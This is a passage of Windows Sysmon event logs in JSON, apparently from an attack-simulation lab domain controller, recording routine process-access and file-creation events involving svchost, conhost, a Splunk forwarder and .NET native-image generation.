C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:56:56.696\r\nProcessGuid: {A837DB8D-0427-5F25-0000-0010C3990B00}\r\nProcessId: 2512\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d0-0\\System.Drawing.dll\r\nCreationUtcTime: 2020-08-01 05:56:56.696","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:56:56.696","ProcessGuid":"{A837DB8D-0427-5F25-0000-0010C3990B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d0-0\\System.Drawing.dll","CreationUtcTime":"2020-08-01 05:56:56.696","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:56.742\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: 